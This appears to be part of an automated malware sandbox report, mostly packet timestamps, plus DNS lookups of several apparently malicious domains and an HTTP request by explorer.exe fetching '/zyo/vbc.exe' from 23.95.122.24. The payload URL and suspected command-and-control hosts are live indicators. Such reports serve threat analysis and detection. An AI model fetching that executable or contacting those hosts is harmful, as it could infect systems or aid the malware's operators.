                                                                                                                                                      Apr 8, 2021 13:09:09.385844946 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385869026 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385886908 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385919094 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385919094 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385967970 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385993958 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386015892 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386032104 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386065006 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386091948 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386117935 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386131048 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386166096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386182070 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386212111 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386214018 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386257887 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386277914 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386307001 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386307955 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386356115 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386398077 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386399984 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386436939 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386445045 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386467934 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386487961 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386502981 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386526108 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386558056 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386564970 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386590958 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386615992 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386624098 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386625051 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386656046 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386674881 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386691093 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386722088 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386723042 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386755943 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386761904 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386797905 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386799097 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386828899 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386831999 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386863947 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386866093 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386898994 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386910915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386930943 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386959076 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386996031 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.388751030 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388775110 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388791084 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388828993 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388880014 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.388901949 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.388922930 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388946056 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388999939 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389616966 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389641047 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389661074 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389682055 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389703035 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389714003 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389740944 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389758110 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389863014 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389887094 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389906883 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389930010 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389935017 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389954090 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389985085 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389991045 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390010118 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390049934 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390069962 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390070915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390091896 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390114069 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390127897 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390136003 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390160084 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390162945 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390187979 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390197039 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390208960 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390227079 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390232086 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390264988 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390269041 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390290976 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390292883 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390322924 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390333891 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390347958 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390387058 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390393019 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390424013 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390444994 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390474081 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390507936 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390531063 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390552044 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390566111 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390568018 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390584946 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390598059 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390607119 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390633106 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390661955 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390665054 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390718937 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390754938 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390777111 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390815973 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390836954 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390882969 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390950918 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390990973 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391012907 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391048908 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.391076088 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.391093016 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391117096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391138077 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391151905 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.391158104 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391177893 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.391180992 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391202927 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.391213894 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.391242027 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.391268015 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.504213095 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.504394054 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.504442930 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.504463911 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.504513025 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.504518032 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.504828930 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.504901886 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.505156994 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.505223036 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506218910 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506258965 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506289959 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506304979 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506314993 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506321907 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506339073 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506355047 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506367922 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506397009 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506400108 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506442070 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506464005 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506499052 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506510973 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506531000 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506544113 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506561995 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506573915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506593943 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506611109 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506625891 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506642103 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506666899 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506671906 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506716013 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506747961 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506782055 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506797075 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506827116 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506835938 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506866932 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506882906 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506906033 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506911993 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506943941 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506951094 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.506977081 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.506987095 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507009029 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507020950 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507052898 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507066011 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507101059 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507123947 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507132053 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507147074 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507174015 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507174015 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507210970 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507221937 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507242918 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507256985 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507282019 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507313967 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507360935 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507363081 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507405996 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507407904 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507453918 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507457972 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507500887 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507507086 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507548094 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.507553101 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507596970 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.507653952 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:10.117811918 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:10:39.852396011 CEST4916880192.168.2.22203.76.236.103
                                                                                                                                                      Apr 8, 2021 13:10:40.007150888 CEST8049168203.76.236.103192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:40.007311106 CEST4916880192.168.2.22203.76.236.103
                                                                                                                                                      Apr 8, 2021 13:10:40.007575989 CEST4916880192.168.2.22203.76.236.103
                                                                                                                                                      Apr 8, 2021 13:10:40.525779009 CEST4916880192.168.2.22203.76.236.103
                                                                                                                                                      Apr 8, 2021 13:10:40.736879110 CEST8049168203.76.236.103192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:41.025316000 CEST4916880192.168.2.22203.76.236.103
                                                                                                                                                      Apr 8, 2021 13:10:41.237016916 CEST8049168203.76.236.103192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:56.458409071 CEST4916980192.168.2.2245.142.156.44
                                                                                                                                                      Apr 8, 2021 13:10:56.630460024 CEST804916945.142.156.44192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:56.630927086 CEST4916980192.168.2.2245.142.156.44
                                                                                                                                                      Apr 8, 2021 13:10:56.630959034 CEST4916980192.168.2.2245.142.156.44
                                                                                                                                                      Apr 8, 2021 13:10:56.803479910 CEST804916945.142.156.44192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:56.803525925 CEST804916945.142.156.44192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:56.803555012 CEST804916945.142.156.44192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:56.803719997 CEST4916980192.168.2.2245.142.156.44
                                                                                                                                                      Apr 8, 2021 13:10:56.803769112 CEST4916980192.168.2.2245.142.156.44
                                                                                                                                                      Apr 8, 2021 13:10:56.975676060 CEST804916945.142.156.44192.168.2.22

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 8, 2021 13:10:38.511143923 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:10:39.512011051 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:10:39.841600895 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:40.826580048 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:46.038341045 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:10:47.048526049 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:10:48.062608004 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:10:48.698407888 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:49.795526028 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:50.936458111 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:10:56.025228024 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:10:56.456235886 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:11:01.810698986 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:11:02.164793968 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:11:27.304687023 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                      Apr 8, 2021 13:11:27.326047897 CEST53495488.8.8.8192.168.2.22

                                                                                                                                                      ICMP Packets

                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                      Apr 8, 2021 13:10:40.826649904 CEST192.168.2.228.8.8.8d017(Port unreachable)Destination Unreachable
                                                                                                                                                      Apr 8, 2021 13:10:49.795681000 CEST192.168.2.228.8.8.8d004(Port unreachable)Destination Unreachable
                                                                                                                                                      Apr 8, 2021 13:10:50.936537027 CEST192.168.2.228.8.8.8d004(Port unreachable)Destination Unreachable

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Apr 8, 2021 13:10:38.511143923 CEST192.168.2.228.8.8.80x708cStandard query (0)www.likehowto.comA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:39.512011051 CEST192.168.2.228.8.8.80x708cStandard query (0)www.likehowto.comA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:46.038341045 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.pjsgsc.comA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:47.048526049 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.pjsgsc.comA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:48.062608004 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.pjsgsc.comA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:56.025228024 CEST192.168.2.228.8.8.80xccffStandard query (0)www.7985699.comA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:11:01.810698986 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.xpddwrfj.icuA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:11:27.304687023 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.hcr.servicesA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Apr 8, 2021 13:10:39.841600895 CEST8.8.8.8192.168.2.220x708cNo error (0)www.likehowto.com203.76.236.103A (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:40.826580048 CEST8.8.8.8192.168.2.220x708cNo error (0)www.likehowto.com203.76.236.103A (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:48.698407888 CEST8.8.8.8192.168.2.220xa14dServer failure (2)www.pjsgsc.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:49.795526028 CEST8.8.8.8192.168.2.220xa14dServer failure (2)www.pjsgsc.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:50.936458111 CEST8.8.8.8192.168.2.220xa14dServer failure (2)www.pjsgsc.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:56.456235886 CEST8.8.8.8192.168.2.220xccffNo error (0)www.7985699.comk9cdna.51w4.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:10:56.456235886 CEST8.8.8.8192.168.2.220xccffNo error (0)k9cdna.51w4.com45.142.156.44A (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:11:02.164793968 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.xpddwrfj.icunonenoneA (IP address)IN (0x0001)
                                                                                                                                                      Apr 8, 2021 13:11:27.326047897 CEST8.8.8.8192.168.2.220x3c4eName error (3)www.hcr.servicesnonenoneA (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 23.95.122.24
                                                                                                                                                      • www.likehowto.com
                                                                                                                                                      • www.7985699.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.224916723.95.122.2480C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Apr 8, 2021 13:09:08.556489944 CEST0OUTGET /zyo/vbc.exe HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                      Host: 23.95.122.24
